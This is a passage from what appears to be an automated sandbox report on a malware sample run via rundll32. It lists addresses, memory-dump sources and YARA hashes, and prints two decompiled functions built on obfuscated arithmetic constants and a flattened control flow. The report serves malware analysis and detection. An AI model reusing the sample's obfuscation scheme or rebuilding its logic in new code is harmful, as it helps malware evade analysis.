                                                                      0x02008dc6
                                                                      0x02008dce
                                                                      0x02008dd6
                                                                      0x02008ddb
                                                                      0x02008de3
                                                                      0x02008deb
                                                                      0x02008df3
                                                                      0x02008dfb
                                                                      0x02008e08
                                                                      0x02008e0c
                                                                      0x02008e14
                                                                      0x02008e1c
                                                                      0x02008e21
                                                                      0x02008e29
                                                                      0x02008e31
                                                                      0x02008e39
                                                                      0x02008e41
                                                                      0x02008e4c
                                                                      0x02008e54
                                                                      0x02008e5f
                                                                      0x02008e6a
                                                                      0x02008e74
                                                                      0x02008e7f
                                                                      0x02008e87
                                                                      0x02008e8c
                                                                      0x02008e94
                                                                      0x02008e9c
                                                                      0x02008ea4
                                                                      0x02008eac
                                                                      0x02008eb4
                                                                      0x02008eb9
                                                                      0x02008ec1
                                                                      0x02008ec9
                                                                      0x02008ece
                                                                      0x02008ed6
                                                                      0x02008ede
                                                                      0x02008ee6
                                                                      0x02008ef1
                                                                      0x02008ef9
                                                                      0x02008f04
                                                                      0x02008f0c
                                                                      0x02008f11
                                                                      0x02008f19
                                                                      0x02008f21
                                                                      0x02008f29
                                                                      0x02008f34
                                                                      0x02008f3c
                                                                      0x02008f47
                                                                      0x02008f4f
                                                                      0x02008f57
                                                                      0x02008f5f
                                                                      0x02008f67
                                                                      0x02008f6f
                                                                      0x02008f7a
                                                                      0x02008f7f
                                                                      0x02008f85
                                                                      0x02008f8d
                                                                      0x02008f95
                                                                      0x02008f9d
                                                                      0x02008fa2
                                                                      0x02008faa
                                                                      0x02008fb2
                                                                      0x02008fba
                                                                      0x02008fc2
                                                                      0x02008fcf
                                                                      0x02008fd0
                                                                      0x02008fd7
                                                                      0x02008fde
                                                                      0x02008fe2
                                                                      0x02008fea
                                                                      0x02008ff2
                                                                      0x02008ffa
                                                                      0x02009002
                                                                      0x0200900a
                                                                      0x02009012
                                                                      0x02009017
                                                                      0x0200901f
                                                                      0x0200902c
                                                                      0x02009030
                                                                      0x02009034
                                                                      0x0200903c
                                                                      0x0200904a
                                                                      0x02009051
                                                                      0x02009055
                                                                      0x0200905d
                                                                      0x02009065
                                                                      0x0200906d
                                                                      0x02009075
                                                                      0x0200907d
                                                                      0x02009085
                                                                      0x0200908d
                                                                      0x0200908d
                                                                      0x00000000
                                                                      0x02009092
                                                                      0x020090a4
                                                                      0x020092b1
                                                                      0x020090aa
                                                                      0x020090ac
                                                                      0x020091b4
                                                                      0x020091b9
                                                                      0x020091bc
                                                                      0x020091be
                                                                      0x020091c0
                                                                      0x020091c2
                                                                      0x020091c2
                                                                      0x020091c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020091c8
                                                                      0x020091e1
                                                                      0x020091e6
                                                                      0x020091e9
                                                                      0x020091eb
                                                                      0x020091f9
                                                                      0x020091f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020091fa
                                                                      0x020091fa
                                                                      0x00000000
                                                                      0x020091ed
                                                                      0x020091ed
                                                                      0x020091ef
                                                                      0x020091f1
                                                                      0x020091f3
                                                                      0x020091c2
                                                                      0x020091c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020091c6
                                                                      0x00000000
                                                                      0x020091f1
                                                                      0x020091c2
                                                                      0x02009201
                                                                      0x02009201
                                                                      0x02009203
                                                                      0x02009226
                                                                      0x0200922b
                                                                      0x00000000
                                                                      0x02009205
                                                                      0x02009216
                                                                      0x0200921c
                                                                      0x0200908d
                                                                      0x0200908d
                                                                      0x00000000
                                                                      0x0200908d
                                                                      0x0200908d
                                                                      0x00000000
                                                                      0x020090b2
                                                                      0x020090b8
                                                                      0x02009170
                                                                      0x02009176
                                                                      0x0200908d
                                                                      0x0200908d
                                                                      0x00000000
                                                                      0x0200908d
                                                                      0x020090be
                                                                      0x020090c4
                                                                      0x0200915c
                                                                      0x00000000
                                                                      0x020090ca
                                                                      0x020090d0
                                                                      0x0200910e
                                                                      0x02009122
                                                                      0x0200913d
                                                                      0x02009142
                                                                      0x02009145
                                                                      0x0200914e
                                                                      0x02009152
                                                                      0x0200908d
                                                                      0x0200908d
                                                                      0x00000000
                                                                      0x0200908d
                                                                      0x020090d2
                                                                      0x020090d8
                                                                      0x0200928c
                                                                      0x0200928c
                                                                      0x02009292
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02009298
                                                                      0x020090de
                                                                      0x020090e2
                                                                      0x020090ed
                                                                      0x020090ee
                                                                      0x020090fa
                                                                      0x020090fc
                                                                      0x02009109
                                                                      0x00000000
                                                                      0x02009109
                                                                      0x020090d8
                                                                      0x020090d0
                                                                      0x020090c4
                                                                      0x020090b8
                                                                      0x020090ac
                                                                      0x020092bc
                                                                      0x020092bc
                                                                      0x020092c5
                                                                      0x00000000
                                                                      0x020092c5
                                                                      0x02009232
                                                                      0x02009269
                                                                      0x0200926e
                                                                      0x02009270
                                                                      0x02009273
                                                                      0x02009276
                                                                      0x02009282
                                                                      0x02009287
                                                                      0x00000000
                                                                      0x02009278
                                                                      0x02009278
                                                                      0x00000000
                                                                      0x02009278
                                                                      0x00000000
                                                                      0x02009276

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: $W^$%n$/3$<_$?0$NN$~r$Y$x
                                                                      • API String ID: 1586166983-2889033865
                                                                      • Opcode ID: 3a9336997b49d9581de405af0501b4296a541a293a598388dd719778ada8fa42
                                                                      • Instruction ID: 9ea793fe65b73f1f1f9c844d588389460ee411a0ad705a07ef0fb6eaaf73ae68
                                                                      • Opcode Fuzzy Hash: 3a9336997b49d9581de405af0501b4296a541a293a598388dd719778ada8fa42
                                                                      • Instruction Fuzzy Hash: 23F1377150C3819FE369CF65C489A5BBBF1BBC5748F108A1CE1EA862A0C7B58905DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024819F, Relevance: 11.6, Strings: 9, Instructions: 310COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $W^$%n$/3$<_$?0$NN$~r$Y$x
                                                                      • API String ID: 0-2889033865
                                                                      • Opcode ID: 3561bd756a9f9aeff14da6113689aaba5774f717805bc6e0dedea9d8832401fc
                                                                      • Instruction ID: ed4dd153620d7a2af4a5b334e09c79308a74a4dd8d6a8dc2896375912ffd2412
                                                                      • Opcode Fuzzy Hash: 3561bd756a9f9aeff14da6113689aaba5774f717805bc6e0dedea9d8832401fc
                                                                      • Instruction Fuzzy Hash: 13F1347152C3819FD3A8CF25C449A5FBBF1BB85748F108A1CF19A962A0CBB58919CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFA821, Relevance: 11.5, Strings: 9, Instructions: 251COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E01FFA821() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _t237;
				signed int _t241;
				void* _t248;
				void* _t254;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				intOrPtr _t287;
				signed int* _t289;
				void* _t291;

				_t289 =  &_v624;
				_v536 = 0x626641;
				_v532 = 0x129981;
				_t287 = 0;
				_v528 = 0;
				_t254 = 0x2e28b741;
				_v524 = 0;
				_v624 = 0x9755;
				_v624 = _v624 + 0xffff0ffe;
				_v624 = _v624 ^ 0x28143b3a;
				_v624 = _v624 + 0xffff9fa9;
				_v624 = _v624 ^ 0xd7eb3c0e;
				_v616 = 0x61ff;
				_v616 = _v616 + 0xfffff5a9;
				_v616 = _v616 ^ 0x00005781;
				_v540 = 0x95c8;
				_v540 = _v540 << 7;
				_v540 = _v540 ^ 0x004af40b;
				_v600 = 0xc6a5;
				_v600 = _v600 + 0xaa28;
				_v600 = _v600 + 0xffff351e;
				_v600 = _v600 ^ 0x0000ff25;
				_v552 = 0xb452;
				_t280 = 7;
				_v552 = _v552 * 0x64;
				_v552 = _v552 ^ 0x0046227b;
				_v576 = 0xc6c;
				_v576 = _v576 / _t280;
				_v576 = _v576 + 0xffff179a;
				_v576 = _v576 ^ 0xffff33c6;
				_v544 = 0xf54b;
				_v544 = _v544 ^ 0xb6fccf77;
				_v544 = _v544 ^ 0xb6fc572e;
				_v560 = 0xea94;
				_v560 = _v560 ^ 0x74db7c03;
				_v560 = _v560 ^ 0x74dbf042;
				_v572 = 0x748e;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 | 0x7bc5136c;
				_v572 = _v572 ^ 0x7bc5304b;
				_v612 = 0xe3c8;
				_v612 = _v612 >> 0xa;
				_v612 = _v612 << 4;
				_t281 = 0x18;
				_v612 = _v612 / _t281;
				_v612 = _v612 ^ 0x0000698f;
				_v568 = 0x502b;
				_v568 = _v568 | 0xfd850b4b;
				_v568 = _v568 ^ 0xfd8572e2;
				_v584 = 0x41d1;
				_t282 = 0x50;
				_v584 = _v584 / _t282;
				_v584 = _v584 << 6;
				_v584 = _v584 ^ 0x000070a2;
				_v588 = 0x111;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 << 0x10;
				_v588 = _v588 ^ 0x000020f0;
				_v608 = 0xeb8a;
				_v608 = _v608 << 9;
				_v608 = _v608 << 7;
				_v608 = _v608 * 0x63;
				_v608 = _v608 ^ 0x165e3696;
				_v548 = 0x5039;
				_v548 = _v548 << 5;
				_v548 = _v548 ^ 0x000a43df;
				_v596 = 0x4562;
				_v596 = _v596 + 0x2a80;
				_t283 = 0x26;
				_v596 = _v596 * 0x30;
				_v596 = _v596 ^ 0x00148087;
				_v624 = 0x923e;
				_v624 = _v624 / _t283;
				_t284 = 0x7c;
				_v624 = _v624 / _t284;
				_v624 = _v624 ^ 0x19d80190;
				_v624 = _v624 ^ 0x19d83119;
				_v564 = 0xf45b;
				_v564 = _v564 << 0xd;
				_v564 = _v564 ^ 0x1e8b638e;
				_v616 = 0xdafb;
				_v616 = _v616 | 0xdd6b0501;
				_v616 = _v616 ^ 0xdd6b820b;
				_v580 = 0xc4fe;
				_t285 = 0x6c;
				_v580 = _v580 * 0x2e;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x011b5ac6;
				_v556 = 0xca0a;
				_v556 = _v556 + 0xe013;
				_v556 = _v556 ^ 0x00019dbb;
				_v604 = 0x6c6f;
				_v604 = _v604 >> 0x10;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x00007655;
				_v592 = 0xed8d;
				_v592 = _v592 + 0x2fd9;
				_t286 = _v616;
				_v592 = _v592 / _t285;
				_v592 = _v592 ^ 0x000f029b;
				while(1) {
					_t291 = _t254 - 0x2e28b741;
					if(_t291 > 0) {
						goto L16;
					}
					L2:
					if(_t291 == 0) {
						_push(_t254);
						_t241 = E01FF54FB(0x45c);
						 *0x2011088 = _t241;
						__eflags = _t241;
						if(_t241 == 0) {
							L23:
							return _t287;
						}
						 *((intOrPtr*)(_t241 + 0x10)) = E02002C05;
						_t254 = 0x1b0f9495;
						continue;
						do {
							while(1) {
								_t291 = _t254 - 0x2e28b741;
								if(_t291 > 0) {
									goto L16;
								}
								goto L2;
							}
							goto L16;
							L22:
							__eflags = _t254 - 0x2142cdf5;
						} while (_t254 != 0x2142cdf5);
						goto L23;
					}
					if(_t254 == 0x1f0026e) {
						_v620 = 0xbbec;
						_t254 = 0x21dfc09c;
						_v620 = _v620 >> 0x10;
						_v620 = _v620 ^ 0x00000029;
						continue;
					}
					if(_t254 == 0x1b0f9495) {
						_t286 = E0200340E(_v552, _v576, _t254, _t254, _v592);
						_t289 =  &(_t289[3]);
						__eflags = _t286;
						if(_t286 == 0) {
							_t254 = 0x3b91f90e;
						} else {
							 *((intOrPtr*)( *0x2011088 + 0x244)) = 1;
							_t254 = 0x1f0026e;
						}
						continue;
					}
					if(_t254 == 0x21dfc09c) {
						E01FF5AB8(_v544, _v560, _v572, _v612, _t286);
						_t289 =  &(_t289[3]);
						L9:
						_t254 = 0x28cf3aa7;
						continue;
					}
					if(_t254 != 0x28cf3aa7) {
						goto L22;
					}
					_push(_t254);
					E01FF471A(_v620,  *0x2011088 + 0x254, _v568, _v584, _v588, _v608, _v548);
					_t289 =  &(_t289[8]);
					_t254 = 0x36e34156;
					_t248 = 1;
					_t287 =  ==  ? _t248 : _t287;
					continue;
					L16:
					__eflags = _t254 - 0x36cafd3f;
					if(__eflags == 0) {
						_push(_t254);
						E01FFDFD8(_v596,  &_v520, __eflags, _v624, _v564);
						_t237 = E01FF165C( &_v520, _v616, _v580, _v556, _v604);
						_t289 =  &(_t289[6]);
						 *((intOrPtr*)( *0x2011088)) = _t237;
						_t254 = 0x2142cdf5;
						goto L22;
					}
					__eflags = _t254 - 0x36e34156;
					if(_t254 == 0x36e34156) {
						E02001F88();
						_t254 = 0x36cafd3f;
						continue;
					}
					__eflags = _t254 - 0x3b91f90e;
					if(_t254 != 0x3b91f90e) {
						goto L22;
					}
					_v620 = 0xad6;
					_v620 = _v620 * 0x11;
					_v620 = _v620 * 0x50;
					_v620 = _v620 | 0x0e445f63;
					_v620 = _v620 ^ 0x0e7ddfff;
					 *((intOrPtr*)( *0x2011088 + 0x14)) = E02005153;
					goto L9;
				}
			}












































                                                                      0x01ffa821
                                                                      0x01ffa82b
                                                                      0x01ffa835
                                                                      0x01ffa83d
                                                                      0x01ffa844
                                                                      0x01ffa848
                                                                      0x01ffa84a
                                                                      0x01ffa84e
                                                                      0x01ffa856
                                                                      0x01ffa85e
                                                                      0x01ffa866
                                                                      0x01ffa86e
                                                                      0x01ffa876
                                                                      0x01ffa87e
                                                                      0x01ffa886
                                                                      0x01ffa88e
                                                                      0x01ffa896
                                                                      0x01ffa89b
                                                                      0x01ffa8a3
                                                                      0x01ffa8ab
                                                                      0x01ffa8b3
                                                                      0x01ffa8bb
                                                                      0x01ffa8c3
                                                                      0x01ffa8d2
                                                                      0x01ffa8d5
                                                                      0x01ffa8d9
                                                                      0x01ffa8e1
                                                                      0x01ffa8f1
                                                                      0x01ffa8f5
                                                                      0x01ffa8fd
                                                                      0x01ffa905
                                                                      0x01ffa90d
                                                                      0x01ffa915
                                                                      0x01ffa91d
                                                                      0x01ffa925
                                                                      0x01ffa92d
                                                                      0x01ffa935
                                                                      0x01ffa93d
                                                                      0x01ffa942
                                                                      0x01ffa94a
                                                                      0x01ffa952
                                                                      0x01ffa95a
                                                                      0x01ffa95f
                                                                      0x01ffa968
                                                                      0x01ffa96d
                                                                      0x01ffa973
                                                                      0x01ffa97b
                                                                      0x01ffa983
                                                                      0x01ffa98b
                                                                      0x01ffa993
                                                                      0x01ffa99f
                                                                      0x01ffa9a2
                                                                      0x01ffa9a6
                                                                      0x01ffa9ab
                                                                      0x01ffa9b3
                                                                      0x01ffa9bb
                                                                      0x01ffa9c0
                                                                      0x01ffa9c5
                                                                      0x01ffa9cd
                                                                      0x01ffa9d5
                                                                      0x01ffa9da
                                                                      0x01ffa9e4
                                                                      0x01ffa9e8
                                                                      0x01ffa9f0
                                                                      0x01ffa9fa
                                                                      0x01ffaa04
                                                                      0x01ffaa0c
                                                                      0x01ffaa14
                                                                      0x01ffaa23
                                                                      0x01ffaa26
                                                                      0x01ffaa2a
                                                                      0x01ffaa32
                                                                      0x01ffaa42
                                                                      0x01ffaa4a
                                                                      0x01ffaa4f
                                                                      0x01ffaa55
                                                                      0x01ffaa5d
                                                                      0x01ffaa65
                                                                      0x01ffaa6d
                                                                      0x01ffaa72
                                                                      0x01ffaa7a
                                                                      0x01ffaa82
                                                                      0x01ffaa8a
                                                                      0x01ffaa92
                                                                      0x01ffaa9f
                                                                      0x01ffaaa0
                                                                      0x01ffaaa4
                                                                      0x01ffaaa9
                                                                      0x01ffaab1
                                                                      0x01ffaab9
                                                                      0x01ffaac1
                                                                      0x01ffaac9
                                                                      0x01ffaad1
                                                                      0x01ffaad6
                                                                      0x01ffaadb
                                                                      0x01ffaae3
                                                                      0x01ffaaeb
                                                                      0x01ffaaf9
                                                                      0x01ffaafd
                                                                      0x01ffab01
                                                                      0x01ffab09
                                                                      0x01ffab09
                                                                      0x01ffab0b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffab11
                                                                      0x01ffab11
                                                                      0x01ffabfd
                                                                      0x01ffabfe
                                                                      0x01ffac03
                                                                      0x01ffac09
                                                                      0x01ffac0b
                                                                      0x01ffacda
                                                                      0x01fface5
                                                                      0x01fface5
                                                                      0x01ffac11
                                                                      0x01ffac18
                                                                      0x01ffac1d
                                                                      0x01ffab09
                                                                      0x01ffab09
                                                                      0x01ffab09
                                                                      0x01ffab0b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffab0b
                                                                      0x00000000
                                                                      0x01ffaccd
                                                                      0x01ffaccd
                                                                      0x01ffaccd
                                                                      0x00000000
                                                                      0x01ffab09
                                                                      0x01ffab1d
                                                                      0x01ffabd4
                                                                      0x01ffabdc
                                                                      0x01ffabe1
                                                                      0x01ffabe6
                                                                      0x00000000
                                                                      0x01ffabe6
                                                                      0x01ffab29
                                                                      0x01ffaba9
                                                                      0x01ffabab
                                                                      0x01ffabae
                                                                      0x01ffabb0
                                                                      0x01ffabca
                                                                      0x01ffabb2
                                                                      0x01ffabba
                                                                      0x01ffabc0
                                                                      0x01ffabc0
                                                                      0x00000000
                                                                      0x01ffabb0
                                                                      0x01ffab31
                                                                      0x01ffab87
                                                                      0x01ffab8c
                                                                      0x01ffab8f
                                                                      0x01ffab8f
                                                                      0x00000000
                                                                      0x01ffab8f
                                                                      0x01ffab35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffab3b
                                                                      0x01ffab5f
                                                                      0x01ffab64
                                                                      0x01ffab67
                                                                      0x01ffab70
                                                                      0x01ffab71
                                                                      0x00000000
                                                                      0x01ffac22
                                                                      0x01ffac22
                                                                      0x01ffac28
                                                                      0x01ffac88
                                                                      0x01ffac9c
                                                                      0x01ffacb8
                                                                      0x01ffacc3
                                                                      0x01ffacc6
                                                                      0x01ffacc8
                                                                      0x00000000
                                                                      0x01ffacc8
                                                                      0x01ffac2a
                                                                      0x01ffac30
                                                                      0x01ffac79
                                                                      0x01ffac7e
                                                                      0x00000000
                                                                      0x01ffac7e
                                                                      0x01ffac32
                                                                      0x01ffac38
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffac3e
                                                                      0x01ffac4b
                                                                      0x01ffac54
                                                                      0x01ffac58
                                                                      0x01ffac60
                                                                      0x01ffac6d
                                                                      0x00000000
                                                                      0x01ffac6d

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
                                                                      • API String ID: 0-509329050
                                                                      • Opcode ID: a3b957fd28c24f7509ad5d4055413b3cdc46758c120e9a3609d685244bdffe37
                                                                      • Instruction ID: 770b247dda1b6b42fbc05c0d5b35b6730acf5682d582fc99e438c433aa0c6a94
                                                                      • Opcode Fuzzy Hash: a3b957fd28c24f7509ad5d4055413b3cdc46758c120e9a3609d685244bdffe37
                                                                      • Instruction Fuzzy Hash: 28C124715083419BD358CF25D98991BFBE2BFC4748F144A1DF29A962A0D3BAC949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00239D95, Relevance: 11.5, Strings: 9, Instructions: 251COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
                                                                      • API String ID: 0-509329050
                                                                      • Opcode ID: 27d1c86281592c8a67a6d0984c4acc852d1cd64e5b51b914d83d14640b456d49
                                                                      • Instruction ID: 9a1eebfe91b24e93c1db07c086fc550f6d3b18597da2cd89055520984b20d9c5
                                                                      • Opcode Fuzzy Hash: 27d1c86281592c8a67a6d0984c4acc852d1cd64e5b51b914d83d14640b456d49
                                                                      • Instruction Fuzzy Hash: 3AC132B11183819BD358CF25C58991BFBE1BBD4B48F104A2EF1D6962A0C3BAC959CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02006BE4, Relevance: 11.5, Strings: 9, Instructions: 244COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E02006BE4(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				unsigned int _v1580;
				signed int _v1584;
				signed int _v1588;
				unsigned int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t245;
				signed int _t255;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t284;
				void* _t285;
				signed int _t288;
				intOrPtr* _t292;
				signed int* _t293;

				_t293 =  &_v1680;
				_t292 = __edx;
				_t259 = __ecx;
				_v1564 = _v1564 & 0x00000000;
				_v1572 = 0x37b7f6;
				_v1568 = 0x1b2ce7;
				_v1632 = 0xec6c;
				_v1632 = _v1632 | 0x543bf563;
				_v1632 = _v1632 ^ 0x543bfd46;
				_v1636 = 0xa23a;
				_v1636 = _v1636 ^ 0x26fe42ca;
				_v1636 = _v1636 >> 0xa;
				_v1636 = _v1636 ^ 0x0009dc41;
				_v1592 = 0x1eb7;
				_v1592 = _v1592 >> 6;
				_v1592 = _v1592 ^ 0x000051d7;
				_v1668 = 0xa1e9;
				_v1668 = _v1668 | 0x5efbd7df;
				_v1668 = _v1668 ^ 0xd3f751b9;
				_v1668 = _v1668 ^ 0x8d0c9003;
				_v1600 = 0x7d57;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x00001a4f;
				_v1608 = 0xd589;
				_v1608 = _v1608 | 0xf26b7913;
				_v1608 = _v1608 << 1;
				_v1608 = _v1608 ^ 0xe4d78fb5;
				_v1660 = 0xf169;
				_v1660 = _v1660 * 0x1f;
				_t285 = 0x2a877a8b;
				_t261 = 0x5a;
				_v1660 = _v1660 * 7;
				_v1660 = _v1660 << 1;
				_v1660 = _v1660 ^ 0x019971bd;
				_v1676 = 0xe75c;
				_v1676 = _v1676 + 0xc4d1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 + 0xffffa84d;
				_v1676 = _v1676 ^ 0xd6161939;
				_v1672 = 0xb9d6;
				_v1672 = _v1672 | 0xb865191f;
				_v1672 = _v1672 ^ 0x5b4935e3;
				_v1672 = _v1672 << 0xd;
				_v1672 = _v1672 ^ 0x9187b9b3;
				_v1680 = 0xc4d6;
				_v1680 = _v1680 + 0x7c91;
				_v1680 = _v1680 + 0xf8dc;
				_v1680 = _v1680 * 0x27;
				_v1680 = _v1680 ^ 0x0056b694;
				_v1616 = 0xc221;
				_v1616 = _v1616 / _t261;
				_v1616 = _v1616 * 0x3f;
				_v1616 = _v1616 ^ 0x0000fe69;
				_v1652 = 0xbd2c;
				_v1652 = _v1652 ^ 0xe1569e35;
				_v1652 = _v1652 << 0xf;
				_v1652 = _v1652 + 0xffff718d;
				_v1652 = _v1652 ^ 0x118bace2;
				_v1580 = 0x567b;
				_v1580 = _v1580 >> 0x10;
				_v1580 = _v1580 ^ 0x00003991;
				_v1576 = 0x298;
				_v1576 = _v1576 << 7;
				_v1576 = _v1576 ^ 0x000109d6;
				_v1588 = 0xb305;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x00433d2e;
				_v1584 = 0x64b3;
				_v1584 = _v1584 >> 0xd;
				_v1584 = _v1584 ^ 0x000018d8;
				_v1624 = 0xad96;
				_t262 = 0x50;
				_v1624 = _v1624 / _t262;
				_v1624 = _v1624 * 0x13;
				_v1624 = _v1624 ^ 0x00007713;
				_v1664 = 0x908a;
				_v1664 = _v1664 >> 6;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 ^ 0x00007bdf;
				_v1644 = 0x7153;
				_v1644 = _v1644 + 0xffffa87a;
				_v1644 = _v1644 << 0xd;
				_v1644 = _v1644 ^ 0x0339cebf;
				_v1640 = 0x1652;
				_v1640 = _v1640 << 0xa;
				_v1640 = _v1640 >> 9;
				_v1640 = _v1640 ^ 0x00000730;
				_v1612 = 0x36fe;
				_v1612 = _v1612 >> 5;
				_v1612 = _v1612 << 3;
				_v1612 = _v1612 ^ 0x000008d8;
				_v1596 = 0x1208;
				_v1596 = _v1596 >> 6;
				_v1596 = _v1596 ^ 0x00000ad2;
				_v1656 = 0xf95a;
				_v1656 = _v1656 ^ 0x8de5a0e4;
				_v1656 = _v1656 + 0xffff7609;
				_v1656 = _v1656 + 0xc07d;
				_v1656 = _v1656 ^ 0x8de5882f;
				_v1620 = 0xca5e;
				_v1620 = _v1620 | 0x2303d271;
				_v1620 = _v1620 + 0xcb9;
				_v1620 = _v1620 ^ 0x2303c846;
				_v1628 = 0x9429;
				_v1628 = _v1628 >> 7;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 ^ 0x0000014e;
				_v1648 = 0x513a;
				_v1648 = _v1648 >> 0xf;
				_v1648 = _v1648 | 0xb7f5bffb;
				_v1648 = _v1648 ^ 0xb7f5b057;
				_v1604 = 0xa39d;
				_v1604 = _v1604 + 0xffffa1e7;
				_v1604 = _v1604 ^ 0x00005123;
				_t284 = _v1604;
				while(_t285 != 0xa9a8994) {
					if(_t285 == 0x1592b590) {
						_push( &_v520);
						_push(0x1ff1000);
						_t245 = E0200B165(_t259, _t292);
						asm("sbb esi, esi");
						_t288 =  ~_t245 & 0xf51449f8;
						L10:
						_t285 = _t288 + 0x29fbdc3d;
						L8:
						_t262 = 0x50;
						continue;
					}
					if(_t285 == 0x1f102635) {
						_push(_t262);
						E01FF471A(_v1632,  &_v1040, _v1668, _v1600, _v1608, _v1660, _v1676);
						_push(0x1ff10b0);
						_push(_v1652);
						_push(_v1616);
						E01FFA4D7(__eflags, _v1576, _v1588, _v1584, _v1624, E01FF5DFC(_v1672, _v1680, __eflags),  &_v1040,  &_v1560,  &_v520);
						E02000D6D(_v1664, _v1644, _v1640, _t248);
						_push(0);
						_push( &_v1560);
						_push(_v1628);
						_push(_v1620);
						_push(_v1656);
						_push(_v1596);
						_push(0);
						_push(0);
						_t255 = E01FF6417(_v1612, __eflags);
						_t293 =  &(_t293[0x1d]);
						asm("sbb esi, esi");
						_t288 =  ~_t255 & 0xe09ead57;
						__eflags = _t288;
						goto L10;
					}
					if(_t285 == 0x29fbdc3d) {
						return E01FFDE81(_v1648, _t284, _v1604);
					}
					if(_t285 != 0x2a877a8b) {
						L13:
						__eflags = _t285 - 0x1e6f5ee2;
						if(_t285 != 0x1e6f5ee2) {
							continue;
						} else {
							return _t255;
						}
						L16:
						return _t255;
					}
					_push(_t262);
					_t255 = E01FF54FB(_t262);
					_t284 = _t255;
					if(_t284 != 0) {
						_t285 = 0x1592b590;
						goto L8;
					}
					goto L16;
				}
				 *((intOrPtr*)(_t284 + 0x44)) = _t259;
				_t285 = 0x1e6f5ee2;
				 *_t284 =  *0x2011084;
				 *0x2011084 = _t284;
				goto L13;
			}














































                                                                      0x02006be4
                                                                      0x02006bee
                                                                      0x02006bf0
                                                                      0x02006bf2
                                                                      0x02006bfa
                                                                      0x02006c02
                                                                      0x02006c0d
                                                                      0x02006c15
                                                                      0x02006c1d
                                                                      0x02006c25
                                                                      0x02006c2d
                                                                      0x02006c35
                                                                      0x02006c3a
